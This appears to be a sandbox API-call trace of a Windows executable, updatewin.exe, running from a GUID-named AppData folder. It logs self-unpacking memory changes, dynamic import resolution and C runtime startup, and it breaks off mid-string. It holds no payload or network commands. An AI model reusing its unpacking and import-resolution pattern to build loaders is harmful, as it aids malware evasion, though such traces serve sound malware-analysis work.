0x76e2186e [0079.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0079.111] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0079.112] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0079.112] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0079.112] SetErrorMode (uMode=0x400) returned 0x0 [0079.270] SetErrorMode (uMode=0x0) returned 0x400 [0079.270] GetVersionExA (in: lpVersionInformation=0x18d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0079.270] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0079.273] VirtualProtect (in: lpAddress=0x400000, dwSize=0x23000, flNewProtect=0x40, lpflOldProtect=0x18e5a8 | out: lpflOldProtect=0x18e5a8*=0x2) returned 1 [0080.010] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.011] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0080.012] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0080.012] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0080.012] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0080.012] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0080.013] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0080.013] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0080.013] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0080.013] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0080.013] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0080.014] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0080.014] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0080.014] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0080.014] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0080.014] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0080.015] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0080.015] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0080.015] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0080.015] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0080.015] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0080.016] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0080.016] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0080.016] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0080.016] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0080.017] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0080.110] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0080.110] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0080.110] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0080.110] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0080.111] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0080.112] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0080.113] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.114] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="InvalidateRect") returned 0x767a1381 [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="wsprintfW") returned 0x767be061 [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="DrawIcon") returned 0x767a8deb [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="FillRect") returned 0x767a0eb6 [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="GetDlgItem") returned 0x767bf1ba [0080.114] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="EndPaint") returned 0x767a1341 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="BeginPaint") returned 0x767a1361 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="DialogBoxParamW") returned 0x767bcfca [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="MoveWindow") returned 0x767a3698 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="GetClientRect") returned 0x767a0c62 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="CreateDialogParamW") returned 0x767c10dc [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowPos") returned 0x76798e4e [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0080.115] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="TranslateAcceleratorW") returned 0x767a1246 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="LoadAcceleratorsW") returned 0x767a4dd6 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="LoadStringW") returned 0x76798eb9 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="LoadIconW") returned 0x7679b142 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="GetMonitorInfoW") returned 0x767a3000 [0080.116] GetProcAddress (hModule=0x76780000, lpProcName="MonitorFromWindow") returned 0x767a3150 [0080.117] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="TextOutW") returned 0x752ed41c [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="SetBkMode") returned 0x752e51a2 [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="CreateFontW") returned 0x752eb600 [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="CreateSolidBrush") returned 0x752e4f17 [0080.117] GetProcAddress (hModule=0x752d0000, lpProcName="SetTextAlign") returned 0x752e8401 [0080.117] LoadLibraryA (lpLibFileName="COMCTL32.dll") returned 0x74240000 [0080.122] GetProcAddress (hModule=0x74240000, lpProcName="InitCommonControlsEx") returned 0x742609ce [0080.122] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74510000 [0080.124] GetProcAddress (hModule=0x74510000, lpProcName="timeGetTime") returned 0x745126e0 [0080.124] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0080.128] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0080.128] atexit (param_1=0x5f63c8) returned 0 [0080.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e5ac | out: lpSystemTimeAsFileTime=0x18e5ac*(dwLowDateTime=0x9eeb6d00, dwHighDateTime=0x1d5d6b4)) [0080.128] GetCurrentThreadId () returned 0x944 [0080.129] GetCurrentProcessId () returned 0x934 [0080.129] QueryPerformanceCounter (in: lpPerformanceCount=0x18e5a4 | out: lpPerformanceCount=0x18e5a4*=22140969496) returned 1 [0080.136] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0080.137] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.137] GetLastError () returned 0x57 [0080.137] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.137] GetLastError () returned 0x57 [0080.137] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0080.137] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0080.137] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.137] GetLastError () returned 0x57 [0080.138] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0080.138] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0080.139] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.139] GetLastError () returned 0x57 [0080.139] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.139] GetLastError () returned 0x57 [0080.139] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0080.139] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0080.140] GetProcessHeap () returned 0x5e0000 [0080.140] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.140] GetLastError () returned 0x57 [0080.140] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0080.140] GetLastError () returned 0x57 [0080.140] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0080.140] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x364) returned 0x60b9c0 [0080.140] SetLastError (dwErrCode=0x57) [0080.140] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xc00) returned 0x60bd30 [0080.143] GetStartupInfoW (in: lpStartupInfo=0x18e4e0 | out: lpStartupInfo=0x18e4e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x402400, hStdOutput=0xb8d31fc5, hStdError=0xfffffffe)) [0080.143] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.143] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.143] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe\" " [0080.143] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe\" " [0080.143] IsValidCodePage (CodePage=0x4e4) returned 1 [0080.143] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e500 | out: lpCPInfo=0x18e500) returned 1 [0080.143] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ddc8 | out: lpCPInfo=0x18ddc8) returned 1 [0080.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.143] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18dddc | out: lpCharType=0x18dddc) returned 1 [0080.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā") returned 256 [0080.144] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.144] GetLastError () returned 0x57 [0080.144] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0080.144] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā", cchSrc=256, lpDestStr=0x18d908, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0080.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18e2dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8dØ\x8a¸\x18å\x18", lpUsedDefaultChar=0x0) returned 256 [0080.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.145] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18d928, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 